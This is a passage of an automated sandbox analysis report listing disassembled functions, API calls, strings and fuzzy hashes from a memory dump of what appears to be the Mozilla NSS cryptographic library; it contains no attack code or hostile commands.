Opcode Fuzzy Hash: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction Fuzzy Hash: C92183B6A402056BFB015AA3AD81FFF366CAB4175CF080034FD04D9646FB26E91A8376

Function 6C5A2E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C5A2CDA,?,00000000), ref: 6C5A2E1E

Part of subcall function 6C5FFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C5A9003,?), ref: 6C5FFD91
Part of subcall function 6C5FFD80: PORT_Alloc_Util.NSS3(A4686C60,?), ref: 6C5FFDA2
Part of subcall function 6C5FFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C60,?,?), ref: 6C5FFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C5A2E33

Part of subcall function 6C5FFD80: free.MOZGLUE(00000000,?,?), ref: 6C5FFDD1

TlsGetValue.KERNEL32 ref: 6C5A2E4E
EnterCriticalSection.KERNEL32(?), ref: 6C5A2E5E
PL_HashTableLookup.NSS3(?), ref: 6C5A2E71
PL_HashTableRemove.NSS3(?), ref: 6C5A2E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C5A2E96
PR_Unlock.NSS3 ref: 6C5A2EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5A2EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5A2EC5

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 1158814970e2cc235ae4cfa9cf6e7604f3046f5833bdcc0309eea335487f1881
Instruction ID: d1c21ea8017e1cd92b8829084a545fd9593afa8de562bcc7d9977b4bb1ed0967
Opcode Fuzzy Hash: 1158814970e2cc235ae4cfa9cf6e7604f3046f5833bdcc0309eea335487f1881
Instruction Fuzzy Hash: 7D210DB6B00100A7DF011B66EC4AAAB3A75DB9235DF044534ED1C82B11FB32C969C7E1

Function 6C58FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C58FD18
sqlite3_initialize.NSS3 ref: 6C58FD5F
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C58FD89
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C58FD99
sqlite3_free.NSS3(00000000), ref: 6C58FE3C
sqlite3_free.NSS3(?), ref: 6C58FEE3
sqlite3_free.NSS3(?), ref: 6C58FEEE

Strings

simple, xrefs: 6C58FC79

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_free$sqlite3_initialize$memcpymemset
String ID: simple
API String ID: 1130978851-3246079234
Opcode ID: d403a901bd2e8aed4942600db07ce9d1a8c54f57c4c70382decf1b89ad731140
Instruction ID: f1abc00e243cec7c34124d22a97e3a78c435b9824ce30eae093ad49cb25df008
Opcode Fuzzy Hash: d403a901bd2e8aed4942600db07ce9d1a8c54f57c4c70382decf1b89ad731140
Instruction Fuzzy Hash: A89151B0A02215DFDB04CF55CC80A6AB7F1FF89318F24C668D9199BB52E735E951CBA0

Function 6C595CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C595EC9
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C595EED

Strings

API call with %s database connection pointer, xrefs: 6C595EC3
%s at line %d of [%.10s], xrefs: 6C595EE0
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C595ED1
misuse, xrefs: 6C595EDB
unable to close due to unfinalized statements or unfinished backups, xrefs: 6C595E64
invalid, xrefs: 6C595EBE

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 632333372-1982981357
Opcode ID: 771021cb757d2d7fbdb8234d25aeaef6c2cec1c60feaf94865ff4be66b8ed170
Instruction ID: 74270e640c9f5b0e11ca9c201247af7e889867679e48c0f82c3d5fbdd4516186
Opcode Fuzzy Hash: 771021cb757d2d7fbdb8234d25aeaef6c2cec1c60feaf94865ff4be66b8ed170
Instruction Fuzzy Hash: F481DF70B067819BEB19CF25CC48B6A7370BF4131AFA807E8D8155BB61C730E966CB91

Function 6C57DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C57DDF9
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C57DE68
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C57DE97
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C57DEB6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C57DF78

Strings

%s at line %d of [%.10s], xrefs: 6C57DE61, 6C57DE90
database corruption, xrefs: 6C57DE5C, 6C57DE8B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C57DE52, 6C57DE81

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1526119172-598938438
Opcode ID: 91a42881e3b513e5a998c5ece766d0f401b35025409d13fcb16047a67d495503
Instruction ID: d756c454773893eba248f52dcb91202399d9339e4ad7bf79ecd524acdb17abd1
Opcode Fuzzy Hash: 91a42881e3b513e5a998c5ece766d0f401b35025409d13fcb16047a67d495503
Instruction Fuzzy Hash: FA81A1716043009FD724CF25CD84B6A77F1AF85318F15886DE89A8BB91EB35E885CB62

Function 6C52CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C52B999), ref: 6C52CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C52B999), ref: 6C52D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C52B999), ref: 6C52D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C52B999), ref: 6C67972B

Strings

%s at line %d of [%.10s], xrefs: 6C52CFEC, 6C52D018, 6C52D029, 6C52D03F, 6C67978B
database corruption, xrefs: 6C52CFE7, 6C52D013, 6C52D028, 6C52D039, 6C52D03E, 6C679786
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C52CFDD, 6C52D00E, 6C52D022, 6C52D033, 6C679780

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 711dd0f70dfbf913542b4ce81d124b802870c0eab8e3c1dede12d4d91acd29ec
Instruction ID: 7f67e36ceb276d492b315c0a54b85388a358dc420aa6fb941699e057ed36dfdd
Opcode Fuzzy Hash: 711dd0f70dfbf913542b4ce81d124b802870c0eab8e3c1dede12d4d91acd29ec
Instruction Fuzzy Hash: EA613971A042108BD320CF29CC40BA6B7F5EF95319F58856DE4489FB82E37AE847C7A5

Function 6C62FFF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C635B40: PR_GetIdentitiesLayer.NSS3 ref: 6C635B56

PK11_FreeSymKey.NSS3(00000000), ref: 6C630113
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C630130
PORT_Alloc_Util.NSS3(00000040), ref: 6C63015D
memcpy.VCRUNTIME140(-00000042,?,?), ref: 6C6301AF
PR_SetError.NSS3(FFFFD056,00000000), ref: 6C630202
free.MOZGLUE(?), ref: 6C630224
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C630253

Strings

exporter, xrefs: 6C6300F7

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Error$Alloc_FreeIdentitiesK11_LayerUtilfreememcpy
String ID: exporter
API String ID: 712147604-111224270
Opcode ID: dad6906d053dda8580828cb3c2b4d303dd59f0f7ca543872f23eb6a3d77dfb1f
Instruction ID: 2387ce6af96fc6ad94a0401694624ab4dcd0fa33bc54d9bd8154e872140278d8
Opcode Fuzzy Hash: dad6906d053dda8580828cb3c2b4d303dd59f0f7ca543872f23eb6a3d77dfb1f
Instruction Fuzzy Hash: C8612471D043999BEF018FA4CC00BEE77B6FF8930CF146228E91E56661E731A958CB49

Function 6C604DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C60536F,00000022,?,?,00000000,?), ref: 6C604E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C604F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C604F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C604FAE
free.MOZGLUE(?), ref: 6C604FC8

Strings

%s=%c%s%c, xrefs: 6C604FA9
%s=%s, xrefs: 6C604F89
oS`l", xrefs: 6C604DFB, 6C604EF4, 6C604EC5

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oS`l"
API String ID: 2709355791-1759582836
Opcode ID: 32009d437ca03b9a3fc3314471f2c0b7b9729a9b111278afaa614427095af79b
Instruction ID: 424f24b5622bfb7793dd26bae22e4c1688db9d56f6a7771babb3a1e2b939fab0
Opcode Fuzzy Hash: 32009d437ca03b9a3fc3314471f2c0b7b9729a9b111278afaa614427095af79b
Instruction Fuzzy Hash: B5519C71B051458BEF29CA6AC6903FF7BF29FA2348F188165E890B7B41D37598068798

Function 6C62EF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C64A4A1,?,00000000,?,00000001), ref: 6C62EF6D

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

htonl.WSOCK32(00000000,?,6C64A4A1,?,00000000,?,00000001), ref: 6C62EFE4
htonl.WSOCK32(?,00000000,?,6C64A4A1,?,00000000,?,00000001), ref: 6C62EFF1
memcpy.VCRUNTIME140(?,?,6C64A4A1,?,00000000,?,6C64A4A1,?,00000000,?,00000001), ref: 6C62F00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C64A4A1,?,00000000,?,00000001), ref: 6C62F027

Strings

dtls13, xrefs: 6C62EF33

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: 1c10a2638670cbfdcd847cdd61d709a3e90c36415bbe5a36d0b8e60f01d8752a
Instruction ID: c01d6127328247a4929be9560c7fa19bea4db85353ccb8e629eb19d42a83218b
Opcode Fuzzy Hash: 1c10a2638670cbfdcd847cdd61d709a3e90c36415bbe5a36d0b8e60f01d8752a
Instruction Fuzzy Hash: F231D071A01211ABC720DF38DC80B8AB7E4EF49349F258079E9189B751E735E915CBE9

Function 6C5AAF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C5AAFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C6C9500,6C5A3F91), ref: 6C5AAFD2

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

DER_GetInteger_Util.NSS3(?), ref: 6C5AB007

Part of subcall function 6C5F6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C5A1666,?,6C5AB00C,?), ref: 6C5F6AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C5AB02F
PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5AB046
PL_FreeArenaPool.NSS3 ref: 6C5AB058
PL_FinishArenaPool.NSS3 ref: 6C5AB060

Strings

security, xrefs: 6C5AAFB8

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: 4cf92ade33d3d8cebdc5909ea81b8eafdd4f257892e68f64add9df237aecb536
Instruction ID: 4a926b3f3dcabd864cd441f504a4093e51bfa53e272912c101c82ecc67b56c2a
Opcode Fuzzy Hash: 4cf92ade33d3d8cebdc5909ea81b8eafdd4f257892e68f64add9df237aecb536
Instruction Fuzzy Hash: 40313571504304D7DB109F669C40BAE77A4BF8632CF104718E9B46BBC1E732914A8B9B

Function 6C5A3E60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 6C5A40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C5A3F7F,?,00000055,?,?,6C5A1666,?,?), ref: 6C5A40D9
Part of subcall function 6C5A40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C5A1666,?,?), ref: 6C5A40FC
Part of subcall function 6C5A40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C5A1666,?,?), ref: 6C5A4138

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A3EC2
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C5A3ED6

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5A3EEE

Part of subcall function 6C5FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5F8D2D,?,00000000,?), ref: 6C5FFB85
Part of subcall function 6C5FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5FFBB1

PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5A3F02
PL_FreeArenaPool.NSS3 ref: 6C5A3F14
PL_FinishArenaPool.NSS3 ref: 6C5A3F1C

Part of subcall function 6C6064F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C60127C,00000000,00000000,00000000), ref: 6C60650E

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5A3F27

Strings

security, xrefs: 6C5A3EBC

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
String ID: security
API String ID: 1076417423-3315324353
Opcode ID: 50b5e1755f9935ceb511122f04aeaa31390982da434c305b926fe524bf04ea3f
Instruction ID: 36dc0ba664b6f81f2bf45ed42990ac76d1e93e3ba7c0c7f11879d2a1591008fd
Opcode Fuzzy Hash: 50b5e1755f9935ceb511122f04aeaa31390982da434c305b926fe524bf04ea3f
Instruction Fuzzy Hash: 6821FBB2A04300ABD7148B55AC41F5B77A8BF8931CF04053DF959A7B41E730D918CB9E

Function 6C5DACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C5DACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5DAD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5DAD23

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5DAD39

Strings

hSession = 0x%x, xrefs: 6C5DACFE, 6C5DAD0E
C_MessageDecryptFinal, xrefs: 6C5DACE1
nkl, xrefs: 6C5DAD51, 6C5DAD7B
(CK_INVALID_HANDLE), xrefs: 6C5DAD1C

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$nkl
API String ID: 332880674-3973460435
Opcode ID: bcb6e567ffe3900aeb9ba1fc20d84deef854bb81e504426bfa990033c90abfb5
Instruction ID: 6d3f43638aa7f7cce649d77a54c54c07cfe5da1c906bf247b5e98e2ab2043f54
Opcode Fuzzy Hash: bcb6e567ffe3900aeb9ba1fc20d84deef854bb81e504426bfa990033c90abfb5
Instruction Fuzzy Hash: 6821F8B1700244DFDB00EF68DD88B6B3775EB82319F454439E40AABA51DF34AC48CB9A

Function 6C5ECC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C5ECD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C5ECE16
PR_SetError.NSS3(00000000,00000000), ref: 6C5ED079

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: dc0dc8ebdddc091dab9d98faa4c1ebb67c8348b81e35a4d9a985a6a55ad4a5c3
Instruction ID: 8b0543a75364668cbb21628750f119b297c71c5842a58c9821d7e282ec54216d
Opcode Fuzzy Hash: dc0dc8ebdddc091dab9d98faa4c1ebb67c8348b81e35a4d9a985a6a55ad4a5c3
Instruction Fuzzy Hash: DAC17FB5A002199BDB11DF24CC80BDABBB4BF8C318F1441A8E958A7741E775EE95CF90

Function 6C5DDC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C5E97C1,?,00000000,00000000,?,?,?,00000000,?,6C5C7F4A,00000000), ref: 6C5DDC68

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5DDD36
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5DDE2D
